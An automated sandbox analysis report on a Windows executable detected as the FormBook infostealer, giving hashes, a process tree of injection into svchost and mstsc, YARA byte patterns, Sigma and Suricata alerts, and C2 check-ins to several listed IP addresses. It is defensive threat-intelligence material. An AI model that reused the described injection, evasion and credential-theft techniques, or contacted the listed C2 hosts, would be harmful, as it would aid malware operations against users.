Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DOC092024-0431202229487.exe

Overview

General Information

Sample name:DOC092024-0431202229487.exe
Analysis ID:1509246
MD5:3a3b2034d8649f6112faa82e0daba310
SHA1:f3f9eb85d09171f0b92412cf5d4229d034f7417e
SHA256:e355fe9720526a9376e0557040f4d2e4eb0772a41b18c027403566500929f4e5
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DOC092024-0431202229487.exe (PID: 6740 cmdline: "C:\Users\user\Desktop\DOC092024-0431202229487.exe" MD5: 3A3B2034D8649F6112FAA82E0DABA310)
    • svchost.exe (PID: 6844 cmdline: "C:\Users\user\Desktop\DOC092024-0431202229487.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • NZuQxWwOkTbZ.exe (PID: 732 cmdline: "C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mstsc.exe (PID: 6940 cmdline: "C:\Windows\SysWOW64\mstsc.exe" MD5: EA4A02BE14C405327EEBA8D9AD2BD42C)
          • NZuQxWwOkTbZ.exe (PID: 3496 cmdline: "C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7156 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1782440738.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.1782440738.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2f243:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x173d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000003.00000002.4144779638.0000000004330000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.4144779638.0000000004330000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bec0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1404f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000001.00000002.1783144995.0000000003650000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e443:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x165d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f243:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x173d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\DOC092024-0431202229487.exe", CommandLine: "C:\Users\user\Desktop\DOC092024-0431202229487.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DOC092024-0431202229487.exe", ParentImage: C:\Users\user\Desktop\DOC092024-0431202229487.exe, ParentProcessId: 6740, ParentProcessName: DOC092024-0431202229487.exe, ProcessCommandLine: "C:\Users\user\Desktop\DOC092024-0431202229487.exe", ProcessId: 6844, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\DOC092024-0431202229487.exe", CommandLine: "C:\Users\user\Desktop\DOC092024-0431202229487.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DOC092024-0431202229487.exe", ParentImage: C:\Users\user\Desktop\DOC092024-0431202229487.exe, ParentProcessId: 6740, ParentProcessName: DOC092024-0431202229487.exe, ProcessCommandLine: "C:\Users\user\Desktop\DOC092024-0431202229487.exe", ProcessId: 6844, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-11T11:17:25.129349+020020507451Malware Command and Control Activity Detected192.168.2.44973681.88.63.4680TCP
            2024-09-11T11:17:49.106206+020020507451Malware Command and Control Activity Detected192.168.2.463320217.70.184.5080TCP
            2024-09-11T11:18:02.763625+020020507451Malware Command and Control Activity Detected192.168.2.463324172.96.187.6080TCP
            2024-09-11T11:18:15.905254+020020507451Malware Command and Control Activity Detected192.168.2.4633283.33.130.19080TCP
            2024-09-11T11:18:29.322120+020020507451Malware Command and Control Activity Detected192.168.2.46333267.223.117.18980TCP
            2024-09-11T11:18:43.806174+020020507451Malware Command and Control Activity Detected192.168.2.463336147.92.40.17580TCP
            2024-09-11T11:18:56.954242+020020507451Malware Command and Control Activity Detected192.168.2.4633403.33.130.19080TCP
            2024-09-11T11:19:10.107614+020020507451Malware Command and Control Activity Detected192.168.2.4633443.33.130.19080TCP
            2024-09-11T11:19:23.495580+020020507451Malware Command and Control Activity Detected192.168.2.4633483.33.130.19080TCP
            2024-09-11T11:19:37.159361+020020507451Malware Command and Control Activity Detected192.168.2.46335285.153.138.11380TCP
            2024-09-11T11:19:50.920421+020020507451Malware Command and Control Activity Detected192.168.2.463356104.21.11.3180TCP
            2024-09-11T11:20:04.080886+020020507451Malware Command and Control Activity Detected192.168.2.463360188.114.97.380TCP
            2024-09-11T11:20:17.882453+020020507451Malware Command and Control Activity Detected192.168.2.4633643.33.130.19080TCP
            2024-09-11T11:20:32.268339+020020507451Malware Command and Control Activity Detected192.168.2.463368206.119.82.13480TCP
            2024-09-11T11:20:45.747099+020020507451Malware Command and Control Activity Detected192.168.2.46337265.21.196.9080TCP
            2024-09-11T11:21:00.793822+020020507451Malware Command and Control Activity Detected192.168.2.46337638.181.141.12280TCP
            2024-09-11T11:21:10.103459+020020507451Malware Command and Control Activity Detected192.168.2.46337781.88.63.4680TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-11T11:17:25.129349+020028554651A Network Trojan was detected192.168.2.44973681.88.63.4680TCP
            2024-09-11T11:17:49.106206+020028554651A Network Trojan was detected192.168.2.463320217.70.184.5080TCP
            2024-09-11T11:18:02.763625+020028554651A Network Trojan was detected192.168.2.463324172.96.187.6080TCP
            2024-09-11T11:18:15.905254+020028554651A Network Trojan was detected192.168.2.4633283.33.130.19080TCP
            2024-09-11T11:18:29.322120+020028554651A Network Trojan was detected192.168.2.46333267.223.117.18980TCP
            2024-09-11T11:18:43.806174+020028554651A Network Trojan was detected192.168.2.463336147.92.40.17580TCP
            2024-09-11T11:18:56.954242+020028554651A Network Trojan was detected192.168.2.4633403.33.130.19080TCP
            2024-09-11T11:19:10.107614+020028554651A Network Trojan was detected192.168.2.4633443.33.130.19080TCP
            2024-09-11T11:19:23.495580+020028554651A Network Trojan was detected192.168.2.4633483.33.130.19080TCP
            2024-09-11T11:19:37.159361+020028554651A Network Trojan was detected192.168.2.46335285.153.138.11380TCP
            2024-09-11T11:19:50.920421+020028554651A Network Trojan was detected192.168.2.463356104.21.11.3180TCP
            2024-09-11T11:20:04.080886+020028554651A Network Trojan was detected192.168.2.463360188.114.97.380TCP
            2024-09-11T11:20:17.882453+020028554651A Network Trojan was detected192.168.2.4633643.33.130.19080TCP
            2024-09-11T11:20:32.268339+020028554651A Network Trojan was detected192.168.2.463368206.119.82.13480TCP
            2024-09-11T11:20:45.747099+020028554651A Network Trojan was detected192.168.2.46337265.21.196.9080TCP
            2024-09-11T11:21:00.793822+020028554651A Network Trojan was detected192.168.2.46337638.181.141.12280TCP
            2024-09-11T11:21:10.103459+020028554651A Network Trojan was detected192.168.2.46337781.88.63.4680TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-11T11:17:40.860929+020028554641A Network Trojan was detected192.168.2.463317217.70.184.5080TCP
            2024-09-11T11:17:44.027833+020028554641A Network Trojan was detected192.168.2.463318217.70.184.5080TCP
            2024-09-11T11:17:46.566841+020028554641A Network Trojan was detected192.168.2.463319217.70.184.5080TCP
            2024-09-11T11:17:55.140962+020028554641A Network Trojan was detected192.168.2.463321172.96.187.6080TCP
            2024-09-11T11:17:57.660795+020028554641A Network Trojan was detected192.168.2.463322172.96.187.6080TCP
            2024-09-11T11:18:00.220299+020028554641A Network Trojan was detected192.168.2.463323172.96.187.6080TCP
            2024-09-11T11:18:08.258289+020028554641A Network Trojan was detected192.168.2.4633253.33.130.19080TCP
            2024-09-11T11:18:11.092973+020028554641A Network Trojan was detected192.168.2.4633263.33.130.19080TCP
            2024-09-11T11:18:13.362343+020028554641A Network Trojan was detected192.168.2.4633273.33.130.19080TCP
            2024-09-11T11:18:22.311407+020028554641A Network Trojan was detected192.168.2.46332967.223.117.18980TCP
            2024-09-11T11:18:24.239922+020028554641A Network Trojan was detected192.168.2.46333067.223.117.18980TCP
            2024-09-11T11:18:26.797160+020028554641A Network Trojan was detected192.168.2.46333167.223.117.18980TCP
            2024-09-11T11:18:36.081007+020028554641A Network Trojan was detected192.168.2.463333147.92.40.17580TCP
            2024-09-11T11:18:38.649480+020028554641A Network Trojan was detected192.168.2.463334147.92.40.17580TCP
            2024-09-11T11:18:41.246867+020028554641A Network Trojan was detected192.168.2.463335147.92.40.17580TCP
            2024-09-11T11:18:49.314259+020028554641A Network Trojan was detected192.168.2.4633373.33.130.19080TCP
            2024-09-11T11:18:51.857060+020028554641A Network Trojan was detected192.168.2.4633383.33.130.19080TCP
            2024-09-11T11:18:54.378506+020028554641A Network Trojan was detected192.168.2.4633393.33.130.19080TCP
            2024-09-11T11:19:02.451571+020028554641A Network Trojan was detected192.168.2.4633413.33.130.19080TCP
            2024-09-11T11:19:05.018538+020028554641A Network Trojan was detected192.168.2.4633423.33.130.19080TCP
            2024-09-11T11:19:07.563352+020028554641A Network Trojan was detected192.168.2.4633433.33.130.19080TCP
            2024-09-11T11:19:15.625649+020028554641A Network Trojan was detected192.168.2.4633453.33.130.19080TCP
            2024-09-11T11:19:18.187779+020028554641A Network Trojan was detected192.168.2.4633463.33.130.19080TCP
            2024-09-11T11:19:20.725939+020028554641A Network Trojan was detected192.168.2.4633473.33.130.19080TCP
            2024-09-11T11:19:29.857744+020028554641A Network Trojan was detected192.168.2.46334985.153.138.11380TCP
            2024-09-11T11:19:32.000620+020028554641A Network Trojan was detected192.168.2.46335085.153.138.11380TCP
            2024-09-11T11:19:34.680405+020028554641A Network Trojan was detected192.168.2.46335185.153.138.11380TCP
            2024-09-11T11:19:43.318591+020028554641A Network Trojan was detected192.168.2.463353104.21.11.3180TCP
            2024-09-11T11:19:45.853997+020028554641A Network Trojan was detected192.168.2.463354104.21.11.3180TCP
            2024-09-11T11:19:48.378230+020028554641A Network Trojan was detected192.168.2.463355104.21.11.3180TCP
            2024-09-11T11:19:56.435701+020028554641A Network Trojan was detected192.168.2.463357188.114.97.380TCP
            2024-09-11T11:19:58.982043+020028554641A Network Trojan was detected192.168.2.463358188.114.97.380TCP
            2024-09-11T11:20:01.547658+020028554641A Network Trojan was detected192.168.2.463359188.114.97.380TCP
            2024-09-11T11:20:10.230010+020028554641A Network Trojan was detected192.168.2.4633613.33.130.19080TCP
            2024-09-11T11:20:12.762486+020028554641A Network Trojan was detected192.168.2.4633623.33.130.19080TCP
            2024-09-11T11:20:15.332520+020028554641A Network Trojan was detected192.168.2.4633633.33.130.19080TCP
            2024-09-11T11:20:24.194165+020028554641A Network Trojan was detected192.168.2.463365206.119.82.13480TCP
            2024-09-11T11:20:27.186100+020028554641A Network Trojan was detected192.168.2.463366206.119.82.13480TCP
            2024-09-11T11:20:29.762687+020028554641A Network Trojan was detected192.168.2.463367206.119.82.13480TCP
            2024-09-11T11:20:38.047407+020028554641A Network Trojan was detected192.168.2.46336965.21.196.9080TCP
            2024-09-11T11:20:40.715590+020028554641A Network Trojan was detected192.168.2.46337065.21.196.9080TCP
            2024-09-11T11:20:43.199036+020028554641A Network Trojan was detected192.168.2.46337165.21.196.9080TCP
            2024-09-11T11:20:53.091857+020028554641A Network Trojan was detected192.168.2.46337338.181.141.12280TCP
            2024-09-11T11:20:55.058547+020028554641A Network Trojan was detected192.168.2.46337438.181.141.12280TCP
            2024-09-11T11:20:57.935818+020028554641A Network Trojan was detected192.168.2.46337538.181.141.12280TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: DOC092024-0431202229487.exeAvira: detected
            Multi AV Scanner detection for submitted file
            Source: DOC092024-0431202229487.exeReversingLabs: Detection: 23%
            Source: DOC092024-0431202229487.exeVirustotal: Detection: 29%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1782440738.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4144779638.0000000004330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1783144995.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4144729578.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4147103044.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4143200808.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1783204016.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4144609194.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: DOC092024-0431202229487.exeJoe Sandbox ML: detected
            Source: DOC092024-0431202229487.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NZuQxWwOkTbZ.exe, 00000002.00000002.4143605796.000000000047E000.00000002.00000001.01000000.00000004.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000002.4143319289.000000000047E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: DOC092024-0431202229487.exe, 00000000.00000003.1689587118.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, DOC092024-0431202229487.exe, 00000000.00000003.1689806543.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1696144266.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1782791889.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1782791889.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1693222050.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.4144953095.00000000046BE000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.4144953095.0000000004520000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1787130944.00000000041CD000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1789604847.000000000437A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: DOC092024-0431202229487.exe, 00000000.00000003.1689587118.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, DOC092024-0431202229487.exe, 00000000.00000003.1689806543.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1696144266.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1782791889.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1782791889.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1693222050.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000003.00000002.4144953095.00000000046BE000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.4144953095.0000000004520000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1787130944.00000000041CD000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1789604847.000000000437A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mstsc.pdbGCTL source: svchost.exe, 00000001.00000003.1751655428.0000000006D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1751502120.0000000006B00000.00000004.00000020.00020000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000002.00000003.1725911829.0000000004047000.00000004.00000001.00020000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000002.00000003.1726302794.000000000418E000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: mstsc.exe, 00000003.00000002.4143406843.0000000002811000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.4145420454.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000000.1855702857.000000000289C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2074422264.000000001DF4C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: mstsc.pdb source: svchost.exe, 00000001.00000003.1751655428.0000000006D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1751502120.0000000006B00000.00000004.00000020.00020000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000002.00000003.1725911829.0000000004047000.00000004.00000001.00020000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000002.00000003.1726302794.000000000418E000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: mstsc.exe, 00000003.00000002.4143406843.0000000002811000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.4145420454.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000000.1855702857.000000000289C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2074422264.000000001DF4C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0072DD92 GetFileAttributesW,FindFirstFileW,FindClose,0_2_0072DD92
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00762044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00762044
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0076219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0076219F
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_007624A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007624A9
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00756B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00756B3F
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00756E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00756E4A
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0075F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0075F350
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0075FD47 FindFirstFileW,FindClose,0_2_0075FD47
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0075FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0075FDD2
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0265C460 FindFirstFileW,FindNextFileW,FindClose,3_2_0265C460
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then xor eax, eax3_2_02649C00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop edi3_2_0264E012
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then mov ebx, 00000004h3_2_044204DE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63347 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63336 -> 147.92.40.175:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63336 -> 147.92.40.175:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 81.88.63.46:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 81.88.63.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63359 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63346 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63368 -> 206.119.82.134:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63375 -> 38.181.141.122:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63368 -> 206.119.82.134:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63335 -> 147.92.40.175:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63326 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63362 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63367 -> 206.119.82.134:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63342 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63366 -> 206.119.82.134:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63322 -> 172.96.187.60:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63328 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63317 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63332 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63325 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63340 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63340 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63343 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63332 -> 67.223.117.189:80
